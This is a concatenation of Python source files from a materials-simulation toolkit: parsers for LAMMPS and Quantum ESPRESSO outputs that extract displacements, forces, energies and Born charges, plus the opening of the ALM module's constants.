self._disp_conversion_factor = 1.0 / self._BOHR_TO_ANGSTROM
self._energy_conversion_factor = 0.5 / self._RYDBERG_TO_EV
else:
raise RuntimeError("This cannot happen")
self._force_conversion_factor \
= self._energy_conversion_factor / self._disp_conversion_factor
def _set_output_flags(self, output_flags):
self._print_disp, self._print_force, \
self._print_energy, self._print_born = output_flags
def _set_number_of_zerofill(self, npattern):
nzero = 1
while True:
npattern //= 10
if npattern == 0:
break
nzero += 1
self._nzerofills = nzero
@property
def nat(self):
return self._nat
@property
def lattice_vector(self):
return self._lattice_vector
@property
def inverse_lattice_vector(self):
return self._inverse_lattice_vector
@property
def atomic_kinds(self):
return self._kd
@property
def x_fractional(self):
return self._x_fractional
@staticmethod
def _get_coordinate_and_force_lammps(lammps_dump_file):
add_flag = False
ret = []
with open(lammps_dump_file) as f:
for line in f:
if "ITEM:" in line and "ITEM: ATOMS id xu yu zu fx fy fz" not in line:
add_flag = False
continue
elif "ITEM: ATOMS id xu yu zu fx fy fz" in line:
add_flag = True
continue
if add_flag:
if line.strip():
entries = line.strip().split()
data_atom = [int(entries[0]),
[float(t) for t in entries[1:4]],
[float(t) for t in entries[4:]]]
ret.append(data_atom)
        # This sort is necessary since the order of atoms in LAMMPS dump files
        # may differ from that of the input structure file.
ret_sorted = sorted(ret)
ret_x = []
ret_f = []
for ret_atom in ret_sorted:
ret_x.extend(ret_atom[1])
ret_f.extend(ret_atom[2])
return np.array(ret_x), np.array(ret_f)
```
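A minimal sketch of calling `LammpsParser` directly, assuming the equilibrium structure file and dump files below exist and the dumps were written with `id xu yu zu fx fy fz` columns (all file names are placeholders):

```python
# Hedged usage sketch; file names are placeholders.
from interface.LAMMPS import LammpsParser

handler = LammpsParser()
# output_flags = (print_disp, print_force, print_energy, print_born)
output_flags = [True, True, False, False]
handler.parse('supercell.lammps',            # equilibrium structure
              ['disp1.dump', 'disp2.dump'],  # LAMMPS dump files to parse
              None,                          # no offset file
              'rydberg',                     # output units
              output_flags)
```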
#### File: tools/interface/QE.py
```python
from __future__ import print_function
import numpy as np
import math
import copy
import sys
class QEParser(object):
def __init__(self):
self._prefix = None
self._lattice_vector = None
self._inverse_lattice_vector = None
self._nat = 0
self._x_fractional = None
self._kd = None
self._kdname = None
self._counter = 1
self._nzerofills = 0
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 1.0
self._force_conversion_factor = 1.0
self._initial_structure_loaded = False
self._print_disp = True
self._print_force = True
self._print_energy = False
self._print_born = False
self._list_CONTROL = []
self._list_SYSTEM = []
self._list_ELECTRONS = []
self._list_ATOMIC_SPECIES = []
self._list_ATOMIC_POSITIONS = []
self._list_K_POINTS = []
self._list_CELL_PARAMETERS = []
self._list_OCCUPATIONS = []
self._celldm = [None] * 6
self._BOHR_TO_ANGSTROM = 0.5291772108
self._RYDBERG_TO_EV = 13.60569253
def load_initial_structure(self, file_in):
# Parse fortran namelists
self._list_CONTROL = self._get_namelist(file_in, "&CONTROL")
self._list_SYSTEM = self._get_namelist(file_in, "&SYSTEM")
self._list_ELECTRONS = self._get_namelist(file_in, "&ELECTRONS")
# Parse general options
tags = ["ATOMIC_SPECIES", "ATOMIC_POSITIONS", "K_POINTS",
"CELL_PARAMETERS", "OCCUPATIONS", "CONSTRAINTS", "ATOMIC_FORCES"]
self._list_ATOMIC_SPECIES = self._get_options("ATOMIC_SPECIES", tags, file_in)
self._list_ATOMIC_POSITIONS = self._get_options("ATOMIC_POSITIONS", tags, file_in)
self._list_K_POINTS = self._get_options("K_POINTS", tags, file_in)
self._list_CELL_PARAMETERS = self._get_options("CELL_PARAMETERS", tags, file_in)
self._list_OCCUPATIONS = self._get_options("OCCUPATIONS", tags, file_in)
# Set lattice vectors and fractional coordinates
self._set_system_info()
self._initial_structure_loaded = True
def generate_structures(self, prefix, header_list, disp_list):
self._set_number_of_zerofill(len(disp_list))
self._prefix = prefix
self._counter = 1
for header, disp in zip(header_list, disp_list):
self._generate_input(header, disp)
def parse(self, initial_pwin, pwout_files, pwout_file_offset, str_unit,
output_flags, filter_emin=None, filter_emax=None):
if not self._initial_structure_loaded:
self.load_initial_structure(initial_pwin)
self._set_unit_conversion_factor(str_unit)
self._set_output_flags(output_flags)
if self._print_disp or self._print_force:
self._print_displacements_and_forces(pwout_files,
pwout_file_offset,
filter_emin,
filter_emax)
elif self._print_energy:
self._print_energies(pwout_files, pwout_file_offset)
elif self._print_born:
self._print_borninfo(pwout_files)
def get_displacements(self, pwout_files, unit="bohr"):
if not self._initial_structure_loaded:
raise RuntimeError("Please call load_initial_structure before using this method")
x0 = np.round(self._x_fractional, 8)
lavec_transpose = self._lattice_vector.transpose()
vec_refold = np.vectorize(self._refold)
disp_merged = []
if unit == "bohr":
unit_factor = 1.0 / self._BOHR_TO_ANGSTROM
elif unit == "angstrom":
unit_factor = 1.0
else:
raise RuntimeError("Invalid unit type. Valid values are 'bohr' and 'angstrom'.")
for search_target in pwout_files:
x = self._get_coordinates_pwout(search_target)
ndata, _, _ = np.shape(x)
disp = np.zeros((ndata, self._nat, 3))
for idata in range(ndata):
disp[idata, :, :] = x[idata, :, :] - x0
disp[idata, :, :] = np.dot(vec_refold(disp[idata, :, :]), lavec_transpose)
disp[idata, :, :] *= unit_factor
disp_merged.extend(disp)
return disp_merged
def _generate_input(self, header, disp):
filename = self._prefix + str(self._counter).zfill(self._nzerofills) + ".pw.in"
with open(filename, 'w') as f:
for entry in self._list_CONTROL:
f.write(entry)
for entry in self._list_SYSTEM:
f.write(entry)
for entry in self._list_ELECTRONS:
f.write(entry)
for entry in self._list_ATOMIC_SPECIES:
f.write(entry)
f.write("ATOMIC_POSITIONS crystal\n")
for i in range(self._nat):
f.write("%s %20.15f %20.15f %20.15f\n" % (self._kdname[self._kd[i]],
self._x_fractional[i][0] + disp[i, 0],
self._x_fractional[i][1] + disp[i, 1],
self._x_fractional[i][2] + disp[i, 2]))
for entry in self._list_K_POINTS:
f.write(entry)
for entry in self._list_CELL_PARAMETERS:
f.write(entry)
for entry in self._list_OCCUPATIONS:
f.write(entry)
f.write("\n")
self._counter += 1
def _print_displacements_and_forces(self, pwout_files,
file_offset, filter_emin, filter_emax):
x0 = np.round(self._x_fractional, 8)
lavec_transpose = self._lattice_vector.transpose() / self._BOHR_TO_ANGSTROM
vec_refold = np.vectorize(self._refold)
# Parse offset component
if file_offset is None:
disp_offset = np.zeros((1, self._nat, 3))
force_offset = np.zeros((self._nat, 3))
epot_offset = 0.0
else:
x_offset = self._get_coordinates_pwout(file_offset)
if x_offset is None:
raise RuntimeError("File %s does not contain position entry" % file_offset)
ndata_offset, _, _ = np.shape(x_offset)
if ndata_offset > 1:
raise RuntimeError("File %s contains too many position entries" % file_offset)
disp_offset = x_offset - x0
force_offset = self._get_atomicforces_pwout(file_offset)
if force_offset is None:
raise RuntimeError("File %s does not contain force entry" % file_offset)
try:
force_offset = np.reshape(force_offset, (self._nat, 3))
            except ValueError:
raise RuntimeError("File %s contains too many force entries" % file_offset)
epot_offset = self._get_energies_pwout(file_offset)
if epot_offset is None:
raise RuntimeError("File %s does not contain energy entry" % file_offset)
            epot_offset = np.array(epot_offset, dtype=np.float64)
if len(epot_offset) > 1:
raise RuntimeError("File %s contains too many energy entries" % file_offset)
for search_target in pwout_files:
x = self._get_coordinates_pwout(search_target)
force = self._get_atomicforces_pwout(search_target)
epot = self._get_energies_pwout(search_target)
if x is None or force is None or epot is None:
continue
num_data_force = len(force) // (3 * self._nat)
force = np.reshape(force, (num_data_force, self._nat, 3))
num_data_disp, _, _ = np.shape(x)
if num_data_disp != num_data_force and self._print_disp and self._print_force:
                print("Error: The numbers of displacement and force entries are inconsistent.")
print("Ndata disp : %d, Ndata force : %d" %
(num_data_disp, num_data_force))
exit(1)
ndata_energy = len(epot)
if ndata_energy != num_data_disp:
raise RuntimeError("The numbers of displacement and energy entries are different.")
            epot = np.array(epot, dtype=np.float64)
epot -= epot_offset
epot *= self._RYDBERG_TO_EV
for idata in range(num_data_disp):
if filter_emin is not None:
if filter_emin > epot[idata]:
continue
if filter_emax is not None:
if filter_emax < epot[idata]:
continue
if self._print_disp:
disp = x[idata, :, :] - x0 - disp_offset
disp = np.dot(vec_refold(disp[0, :, :]), lavec_transpose)
disp *= self._disp_conversion_factor
if self._print_force:
f = force[idata, :, :] - force_offset
f *= self._force_conversion_factor
print("# Filename: %s, Snapshot: %d, E_pot (eV): %s" %
(search_target, idata + 1, epot[idata]))
if self._print_disp and self._print_force:
for i in range(self._nat):
print("%15.7F %15.7F %15.7F %20.8E %15.8E %15.8E" % (disp[i, 0],
disp[i, 1],
disp[i, 2],
f[i, 0],
f[i, 1],
f[i, 2]))
elif self._print_disp:
for i in range(self._nat):
print("%15.7F %15.7F %15.7F" % (disp[i, 0],
disp[i, 1],
disp[i, 2]))
elif self._print_force:
for i in range(self._nat):
print("%15.8E %15.8E %15.8E" % (f[i, 0],
f[i, 1],
f[i, 2]))
def _print_energies(self, pwout_files, file_offset):
if file_offset is None:
etot_offset = 0.0
else:
data = self._get_energies_pwout(file_offset)
if data is None:
raise RuntimeError("File %s does not contain energy entry" % file_offset)
if len(data) > 1:
raise RuntimeError("File %s contains too many energy entries" % file_offset)
etot_offset = data[0]
print("# Etot")
for search_target in pwout_files:
etot = self._get_energies_pwout(search_target)
if etot is None:
continue
for idata in range(len(etot)):
val = etot[idata] - etot_offset
val *= self._energy_conversion_factor
print("%19.11E" % val)
def _print_borninfo(self, phout_files):
for search_target in phout_files:
dielec, borncharge = self._get_borninfo_phout(search_target)
nat_prim, _, _ = np.shape(borncharge)
for i in range(3):
print("%16.8F %16.8F %16.8F" %
(dielec[i, 0], dielec[i, 1], dielec[i, 2]))
for j in range(nat_prim):
for i in range(3):
print("%16.8F %16.8F %16.8F" % (borncharge[j, i, 0],
borncharge[j, i, 1],
borncharge[j, i, 2]))
def _set_system_info(self):
list_mod = []
for obj in self._list_SYSTEM:
obj_split = obj.rstrip().split(',')
for subobj in obj_split:
if subobj:
index = subobj.find('=')
if index > 0:
subobj = subobj[:index] + " = " + subobj[index + 1:]
list_mod.append(subobj)
str_input = ""
for entry in list_mod:
str_input += entry + " "
entrylist = str_input.split()
for i in range(len(entrylist)):
if "ibrav" in entrylist[i]:
ibrav = int(entrylist[i + 2])
if "nat" in entrylist[i]:
self._nat = int(entrylist[i + 2])
if "ntyp" in entrylist[i]:
ntyp = int(entrylist[i + 2])
if "celldm(1)" in entrylist[i]:
# Do not assign the value if the comment character '!'
# appears in front of the celldm(1) keyword
has_comment = False
for elem in self._list_SYSTEM:
if "celldm(1)" in elem:
has_comment = ('!' == elem.strip().split()[0][0])
if not has_comment:
self._celldm[0] = float(entrylist[i + 2])
if "celldm(2)" in entrylist[i]:
self._celldm[1] = float(entrylist[i + 2])
if "celldm(3)" in entrylist[i]:
self._celldm[2] = float(entrylist[i + 2])
if "celldm(4)" in entrylist[i]:
self._celldm[3] = float(entrylist[i + 2])
if "celldm(5)" in entrylist[i]:
self._celldm[4] = float(entrylist[i + 2])
if "celldm(6)" in entrylist[i]:
self._celldm[5] = float(entrylist[i + 2])
self._set_lattice_vector(ibrav)
self._set_fractional_coordinate()
    def _set_lattice_vector(self, ibrav):
        """
        Compute the lattice vectors in units of Angstrom for the given ibrav and celldm.
Doc/INPUT_PW.txt was used as a reference.
"""
lavec = np.zeros((3, 3))
if ibrav == 0:
if self._list_CELL_PARAMETERS is None:
raise RuntimeError("CELL_PARAMETERS must be given when ibrav = 0.")
mode = self._list_CELL_PARAMETERS[0].rstrip().split()
if len(mode) == 1:
raise RuntimeError(
"Error : Please specify either alat, bohr, or angstrom for CELL_PARAMETERS")
mode_str = mode[1].lower()
for i in range(3):
lavec[i][:] = [float(entry) for entry in
self._list_CELL_PARAMETERS[i + 1].rstrip().split()]
lavec = np.array(lavec)
if "alat" in mode_str:
if not self._celldm[0]:
raise RuntimeError(
"celldm(1) must be given when 'alat' is used for CELL_PARAMETERS")
for i in range(3):
for j in range(3):
lavec[i][j] *= self._celldm[0]
elif "angstrom" in mode_str:
                # Convert the lattice vectors to Bohr units here; they are
                # converted back to the Angstrom unit at the end of this method.
for i in range(3):
for j in range(3):
lavec[i][j] /= self._BOHR_TO_ANGSTROM
elif "bohr" not in mode_str:
raise RuntimeError("Error : Invalid option for CELL_PARAMETERS: %s" %
mode[1])
elif ibrav == 1:
if not self._celldm[0]:
raise RuntimeError("celldm(1) must be given when ibrav = 1.")
else:
a = self._celldm[0]
lavec = np.array([[a, 0.0, 0.0],
[0.0, a, 0.0],
[0.0, 0.0, a]])
elif ibrav == 2:
if not self._celldm[0]:
raise RuntimeError("celldm(1) must be given when ibrav = 2.")
else:
a = self._celldm[0] / 2.0
lavec = np.array([[-a, 0.0, a],
[0.0, a, a],
[-a, a, 0.0]])
elif ibrav == 3:
if not self._celldm[0]:
raise RuntimeError("celldm(1) must be given when ibrav = 3.")
else:
a = self._celldm[0] / 2.0
lavec = np.array([[a, a, a],
[-a, a, a],
[-a, -a, a]])
elif ibrav == 4:
if not self._celldm[0] or not self._celldm[2]:
raise RuntimeError("celldm(1) and celldm(3) must be given when ibrav = 4.")
else:
a = self._celldm[0]
c = self._celldm[0] * self._celldm[2]
lavec = np.array([[a, 0.0, 0.0],
[-0.5 * a, math.sqrt(3.) / 2.0 * a, 0.0],
[0.0, 0.0, c]])
elif ibrav == 5 or ibrav == -5:
if not self._celldm[0] or not self._celldm[3]:
raise RuntimeError("celldm(1) and celldm(4) must be given when ibrav = 5, -5.")
else:
a = self._celldm[0]
cosalpha = self._celldm[3]
tx = a * math.sqrt((1.0 - cosalpha) / 2.)
ty = a * math.sqrt((1.0 - cosalpha) / 6.)
tz = a * math.sqrt((1.0 + 2.0 * cosalpha) / 3.)
if ibrav == 5:
lavec = np.array([[tx, -ty, tz],
[0.0, 2.0 * ty, tz],
[-tx, -ty, tz]])
else:
a_prime = a / math.sqrt(3.0)
u = tz - 2.0 * math.sqrt(2.0) * ty
v = tz + math.sqrt(2.0) * ty
u *= a_prime
v *= a_prime
lavec = np.array([[u, v, v],
[v, u, v],
[v, v, u]])
elif ibrav == 6:
if not self._celldm[0] or not self._celldm[2]:
raise RuntimeError("celldm(1) and celldm(3) must be given when ibrav = 6.")
else:
a = self._celldm[0]
c = self._celldm[0] * self._celldm[2]
lavec = np.array([[a, 0.0, 0.0],
[0.0, a, 0.0],
[0.0, 0.0, c]])
elif ibrav == 7:
if not self._celldm[0] or not self._celldm[2]:
raise RuntimeError("celldm(1) and celldm(3) must be given when ibrav = 7.")
else:
a = self._celldm[0]
c = self._celldm[0] * self._celldm[2]
lavec = np.array([[a / 2.0, -a / 2.0, c / 2.0],
[a / 2.0, a / 2.0, c / 2.0],
[-a / 2.0, -a / 2.0, c / 2.0]])
elif ibrav == 8:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2]:
raise RuntimeError("celldm(1), celldm(2), and celldm(3) must be given\
when ibrav = 8.")
else:
a = self._celldm[0]
b = self._celldm[0] * self._celldm[1]
c = self._celldm[0] * self._celldm[2]
lavec = np.array([[a, 0.0, 0.0],
[0.0, b, 0.0],
[0.0, 0.0, c]])
elif ibrav == 9 or ibrav == -9:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2]:
raise RuntimeError("celldm(1), celldm(2), and celldm(3) must be given\
when ibrav = 9 or -9.")
else:
a = self._celldm[0]
b = self._celldm[0] * self._celldm[1]
c = self._celldm[0] * self._celldm[2]
if ibrav == 9:
lavec = np.array([[a / 2., b / 2., 0.0],
[-a / 2., b / 2., 0.0],
[0.0, 0.0, c]])
else:
lavec = np.array([[a / 2., -b / 2., 0.0],
[a / 2., b / 2., 0.0],
[0.0, 0.0, c]])
elif ibrav == 10:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2]:
raise RuntimeError("celldm(1), celldm(2), and celldm(3) must be given\
when ibrav = 10.")
else:
a = self._celldm[0] / 2.0
b = self._celldm[0] * self._celldm[1] / 2.0
c = self._celldm[0] * self._celldm[2] / 2.0
lavec = np.array([[a, 0.0, c],
[a, b, 0.0],
[0.0, b, c]])
elif ibrav == 11:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2]:
raise RuntimeError("celldm(1), celldm(2), and celldm(3) must be given\
when ibrav = 11.")
else:
a = self._celldm[0] / 2.0
b = self._celldm[0] * self._celldm[1] / 2.0
c = self._celldm[0] * self._celldm[2] / 2.0
lavec = np.array([[a, b, c],
[-a, b, c],
[-a, -b, c]])
elif ibrav == 12:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2] or \
not self._celldm[3]:
raise RuntimeError("celldm(1), celldm(2), celldm(3), and celldm(4)\
must be given when ibrav = 12.")
else:
a = self._celldm[0]
b = self._celldm[0] * self._celldm[1]
c = self._celldm[0] * self._celldm[2]
gamma = math.acos(self._celldm[3])
lavec = np.array([[a, 0.0, 0.0],
[b * math.cos(gamma), b * math.sin(gamma), 0.0],
[0.0, 0.0, c]])
elif ibrav == -12:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2] or \
not self._celldm[4]:
raise RuntimeError("celldm(1), celldm(2), celldm(3), and celldm(5)\
must be given when ibrav = -12.")
else:
a = self._celldm[0]
b = self._celldm[0] * self._celldm[1]
c = self._celldm[0] * self._celldm[2]
beta = math.acos(self._celldm[4])
lavec = np.array([[a, 0.0, 0.0],
[0.0, b, 0.0],
[c * math.cos(beta), 0.0, c * math.sin(beta)]])
elif ibrav == 13:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2] or \
not self._celldm[3]:
raise RuntimeError("celldm(1), celldm(2), celldm(3), and celldm(4)\
must be given when ibrav = 13.")
else:
a = self._celldm[0]
b = self._celldm[0] * self._celldm[1]
c = self._celldm[0] * self._celldm[2]
gamma = math.acos(self._celldm[3])
lavec = np.array([[a / 2.0, 0.0, -c / 2.0],
[b * math.cos(gamma), b * math.sin(gamma), 0.0],
[a / 2.0, 0.0, c / 2.0]])
elif ibrav == 14:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2] or \
not self._celldm[3] or not self._celldm[4] or not self._celldm[5]:
raise RuntimeError("All celldm must be given when ibrav = 14.")
else:
a = self._celldm[0]
b = self._celldm[0] * self._celldm[1]
c = self._celldm[0] * self._celldm[2]
alpha = math.acos(self._celldm[3])
beta = math.acos(self._celldm[4])
gamma = math.acos(self._celldm[5])
lavec = np.array([[a, 0.0, 0.0],
[b * math.cos(gamma), b * math.sin(gamma), 0.0],
[c * math.cos(beta),
c * (math.cos(alpha) - math.cos(beta) *
math.cos(gamma)) / math.sin(gamma),
c * math.sqrt(1.0 + 2.0 * math.cos(alpha) * math.cos(beta) * math.cos(gamma)
- math.cos(alpha) ** 2 - math.cos(beta) ** 2 - math.cos(
gamma) ** 2) / math.sin(gamma)]])
else:
raise RuntimeError("Invalid ibrav = %s" % ibrav)
# if celldm(1) is empty, calculate it from the lattice vector for later use.
if not self._celldm[0]:
self._celldm[0] = math.sqrt(np.dot(lavec[0][:], lavec[0][:]))
# Transpose for later use
lavec = lavec.transpose()
# Convert to Angstrom unit
for i in range(3):
for j in range(3):
lavec[i][j] *= self._BOHR_TO_ANGSTROM
self._lattice_vector = lavec
self._inverse_lattice_vector = np.linalg.inv(lavec)
def _set_fractional_coordinate(self):
list_tmp = self._list_ATOMIC_POSITIONS[0].rstrip().split()
if len(list_tmp) == 1:
raise RuntimeError("Error : Please specify either alat, "
" bohr, angstrom, or crystal for ATOMIC_POSITIONS")
mode_str = list_tmp[1].lower()
if "crystal_sg" in mode_str:
raise RuntimeError(
"Error : Sorry. 'crystal_sg' is not supported in this script. "
"Please use another option.")
xtmp = np.zeros((self._nat, 3))
kd = []
for i in range(self._nat):
list_tmp = self._list_ATOMIC_POSITIONS[i + 1].rstrip().split()
kd.append(list_tmp[0])
xtmp[i][:] = [float(j) for j in list_tmp[1:4]]
# lattice_vector is in units of Angstrom, so the unit of aa_inv is (Angstrom)^-1
aa_inv = copy.deepcopy(self._inverse_lattice_vector)
if "alat" in mode_str:
            # atomic positions are in cartesian coordinates in units of the lattice parameter celldm(1)
a_angstrom = self._celldm[0] * self._BOHR_TO_ANGSTROM
for i in range(3):
for j in range(3):
aa_inv[i][j] *= a_angstrom
for i in range(self._nat):
xtmp[i][:] = np.dot(xtmp[i][:], aa_inv.transpose())
elif "bohr" in mode_str:
for i in range(3):
for j in range(3):
aa_inv[i][j] *= self._BOHR_TO_ANGSTROM
for i in range(self._nat):
xtmp[i][:] = np.dot(xtmp[i][:], aa_inv.transpose())
elif "angstrom" in mode_str:
for i in range(self._nat):
xtmp[i][:] = np.dot(xtmp[i][:], aa_inv.transpose())
elif "crystal" not in mode_str:
raise RuntimeError("Error : Invalid option for ATOMIC_POSITIONS: %s" % mode_str)
kdname = []
for entry in kd:
if entry not in kdname:
kdname.append(entry)
dict_kd = {}
counter = 0
for name in kdname:
dict_kd[name] = counter
counter += 1
kd_int = []
for entry in kd:
kd_int.append(dict_kd[entry])
self._kd = kd_int
self._kdname = kdname
self._x_fractional = xtmp
def _set_number_of_zerofill(self, npattern):
nzero = 1
while True:
npattern //= 10
if npattern == 0:
break
nzero += 1
self._nzerofills = nzero
def _set_unit_conversion_factor(self, str_unit):
if str_unit == "ev":
self._disp_conversion_factor = self._BOHR_TO_ANGSTROM
self._energy_conversion_factor = self._RYDBERG_TO_EV
elif str_unit == "rydberg":
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 1.0
elif str_unit == "hartree":
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 0.5
else:
raise RuntimeError("This cannot happen.")
self._force_conversion_factor = self._energy_conversion_factor / self._disp_conversion_factor
def _set_output_flags(self, output_flags):
self._print_disp, self._print_force, \
self._print_energy, self._print_born = output_flags
@property
def nat(self):
return self._nat
@nat.setter
def nat(self, nat):
self._nat = nat
@property
def lattice_vector(self):
return self._lattice_vector
@lattice_vector.setter
def lattice_vector(self, lattice_vector):
self._lattice_vector = lattice_vector
self._inverse_lattice_vector = np.linalg.inv(lattice_vector)
@property
def inverse_lattice_vector(self):
return self._inverse_lattice_vector
@property
def kd(self):
return self._kd
@property
def kd_in_str(self):
return [self._kdname[i] for i in self._kd]
@kd.setter
def kd(self, kd):
self._kd = kd
@kd_in_str.setter
def kd_in_str(self, kd_in_str):
map_name2num = {}
for i, name in enumerate(self._kdname):
map_name2num[name] = i
self._kd = [map_name2num[t] for t in kd_in_str]
@property
def atomic_kinds(self):
return self._kd
@property
def x_fractional(self):
return self._x_fractional
@x_fractional.setter
def x_fractional(self, x_fractional):
self._x_fractional = x_fractional
@property
def list_system(self):
return self._list_SYSTEM
@list_system.setter
def list_system(self, list_in):
self._list_SYSTEM = list_in
@property
def list_cell_parameters(self):
return self._list_CELL_PARAMETERS
@list_cell_parameters.setter
def list_cell_parameters(self, list_in):
self._list_CELL_PARAMETERS = list_in
@property
def list_k_points(self):
return self._list_K_POINTS
@list_k_points.setter
def list_k_points(self, list_in):
self._list_K_POINTS = list_in
@staticmethod
def _get_namelist(file_in, namelist_tag):
list_out = []
flag_add = False
with open(file_in) as openfileobject:
for line in openfileobject:
line_upper = line.upper()
if namelist_tag in line_upper:
flag_add = True
list_out.append(line)
elif line.strip() == "/":
flag_add = False
elif flag_add:
list_out.append(line)
if len(list_out) == 0:
print("%s field not found" % namelist_tag)
exit(1)
list_out.append("/\n")
return list_out
@staticmethod
def _get_options(option_tag, taglists, file_in):
list_out = []
flag_add = False
with open(file_in) as openfileobject:
for line in openfileobject:
if option_tag in line:
flag_add = True
list_out.append(line)
elif len(line.split()) > 0 and line.split()[0] in taglists:
flag_add = False
elif flag_add:
if line.strip():
list_out.append(line)
return list_out
@staticmethod
def _refold(x):
if x >= 0.5:
return x - 1.0
elif x < -0.5:
return x + 1.0
else:
return x
def _get_coordinates_pwout(self, pwout_file):
"""
Return the fractional coordinates of atoms
"""
search_flag = "site n. atom positions (alat units)"
x = np.zeros((self._nat, 3))
num_data_disp_extra = 0
basis = ""
found_tag = False
f = open(pwout_file, 'r')
line = f.readline()
while line:
if search_flag in line:
found_tag = True
for i in range(self._nat):
line = f.readline()
x[i][:] = [float(t) for t in line.rstrip().split()[6:9]]
break
line = f.readline()
if not found_tag:
#print("%s tag not found in %s" % (search_flag, pwout_file), file=sys.stderr)
return None
x = self._celldm[0] * np.dot(x, self._inverse_lattice_vector.transpose()) \
* self._BOHR_TO_ANGSTROM
# Search additional entries containing atomic position
# (for parsing MD trajectory)
search_flag2 = "ATOMIC_POSITIONS "
x_additional = []
while line:
if search_flag2 in line:
if not basis:
basis = line.rstrip().split()[1]
num_data_disp_extra += 1
for i in range(self._nat):
line = f.readline()
x_additional.extend([t for t in line.rstrip().split()[1:4]])
line = f.readline()
f.close()
        x_additional = np.array(x_additional, dtype=np.float64)
# The basis of the coordinate in x_additional can be different
# from that of x. Therefore, perform basis conversion here.
if num_data_disp_extra > 0:
if "alat" in basis:
conversion_mat = self._celldm[0] \
* self._inverse_lattice_vector.transpose() \
* self._BOHR_TO_ANGSTROM
elif "bohr" in basis:
                conversion_mat = self._inverse_lattice_vector.transpose() \
                    * self._BOHR_TO_ANGSTROM
elif "angstrom" in basis:
conversion_mat = self._inverse_lattice_vector.transpose()
elif "crystal" in basis:
conversion_mat = np.identity(3)
else:
raise RuntimeError("This cannot happen.")
x_additional = np.reshape(x_additional, (num_data_disp_extra, self._nat, 3))
for i in range(num_data_disp_extra):
x_additional[i, :, :] \
= np.dot(x_additional[i, :, :], conversion_mat)
if num_data_disp_extra <= 1:
return np.reshape(x, (1, self._nat, 3))
else:
x_merged = np.zeros((num_data_disp_extra, self._nat, 3))
x_merged[0, :, :] = x[:, :]
x_merged[1:, :, :] = x_additional[:-1, :, :]
return x_merged
def _get_atomicforces_pwout(self, pwout_file):
search_tag = "Forces acting on atoms (Ry/au):"
search_tag_QE6 = "Forces acting on atoms (cartesian axes, Ry/au):"
found_tag = False
f = open(pwout_file, 'r')
line = f.readline()
force = []
while line:
if search_tag in line or search_tag_QE6 in line:
found_tag = True
f.readline()
for i in range(self._nat):
line = f.readline()
force.extend([t for t in line.rstrip().split()[6:9]])
line = f.readline()
f.close()
if not found_tag:
            print("The following search tags were not found in %s" % pwout_file, file=sys.stderr)
print(search_tag, file=sys.stderr)
print(search_tag_QE6, file=sys.stderr)
return None
        return np.array(force, dtype=np.float64)
@staticmethod
def _get_energies_pwout(pwout_file):
search_tag = "! total energy"
found_tag = False
etot = []
with open(pwout_file) as openfileobject:
for line in openfileobject:
if search_tag in line:
etot.extend([line.rstrip().split()[4]])
found_tag = True
if not found_tag:
print("%s tag not found in %s" % (search_tag, pwout_file), file=sys.stderr)
return None
        return np.array(etot, dtype=np.float64)
@staticmethod
def _get_borninfo_phout(phout_file):
dielec = []
borncharge = []
search_tag1 = "Dielectric constant in cartesian axis"
f = open(phout_file, 'r')
line = f.readline()
found_tag1 = False
found_tag2 = False
while line:
if search_tag1 in line:
found_tag1 = True
f.readline()
for i in range(3):
line = f.readline()
dielec.extend([float(t) for t in line.strip().split()[1:4]])
if "Px" in line or "Py" in line or "Pz" in line:
found_tag2 = True
borncharge.extend(float(t) for t in line.strip().split()[2:5])
line = f.readline()
f.close()
if not found_tag1 or not found_tag2:
            print("Dielectric constants or Born effective charges are not found "
                  "in %s" % phout_file, file=sys.stderr)
return None
nat = len(borncharge) // 9
dielec = np.reshape(np.array(dielec[9:]), (3, 3))
borncharge = np.reshape(np.array(borncharge), (nat, 3, 3))
return dielec, borncharge
``` |
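A minimal sketch of using `QEParser` to collect atomic displacements from pw.x outputs, assuming the file names below are placeholders for an existing QE calculation:

```python
# Hedged usage sketch; file names are placeholders.
from interface.QE import QEParser

qe = QEParser()
qe.load_initial_structure('supercell.pw.in')
# One (nat, 3) array of Cartesian displacements per snapshot found in the outputs
disp = qe.get_displacements(['disp01.pw.out', 'disp02.pw.out'], unit='bohr')
print('%d snapshot(s) parsed' % len(disp))
```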
{
"source": "jochym/ALM",
"score": 2
} |
#### File: python/alm/alm.py
```python
import warnings
from collections import OrderedDict
import numpy as np
from . import _alm as alm
atom_names = ("X", "H", "He", "Li", "Be", "B", "C", "N", "O", "F",
"Ne", "Na", "Mg", "Al", "Si", "P", "S", "Cl", "Ar", "K",
"Ca", "Sc", "Ti", "V", "Cr", "Mn", "Fe", "Co", "Ni", "Cu",
"Zn", "Ga", "Ge", "As", "Se", "Br", "Kr", "Rb", "Sr", "Y",
"Zr", "Nb", "Mo", "Tc", "Ru", "Rh", "Pd", "Ag", "Cd", "In",
"Sn", "Sb", "Te", "I", "Xe", "Cs", "Ba", "La", "Ce", "Pr",
"Nd", "Pm", "Sm", "Eu", "Gd", "Tb", "Dy", "Ho", "Er", "Tm",
"Yb", "Lu", "Hf", "Ta", "W", "Re", "Os", "Ir", "Pt", "Au",
"Hg", "Tl", "Pb", "Bi", "Po", "At", "Rn", "Fr", "Ra", "Ac",
"Th", "Pa", "U", "Np", "Pu", "Am", "Cm", "Bk", "Cf", "Es",
"Fm", "Md", "No", "Lr", "Rf", "Db", "Sg", "Bh", "Hs", "Mt",
"Ds", "Rg", "Cn", "Uut", "Uuq", "Uup", "Uuh", "Uus", "Uuo")
# From src/optimize.h
# {sparsesolver: str} is omitted because this is set at ALM.optimize.
# This order must not be changed because it is explicitly used in _alm.c.
optimizer_control_data_types = OrderedDict([
('linear_model', int),
('use_sparse_solver', int),
('maxnum_iteration', int),
('tolerance_iteration', float),
('output_frequency', int),
('standardize', int),
('displacement_normalization_factor', float),
('debiase_after_l1opt', int),
('cross_validation', int),
('l1_alpha', float),
('l1_alpha_min', float),
('l1_alpha_max', float),
('num_l1_alpha', int),
('l1_ratio', float),
('save_solution_path', int)])
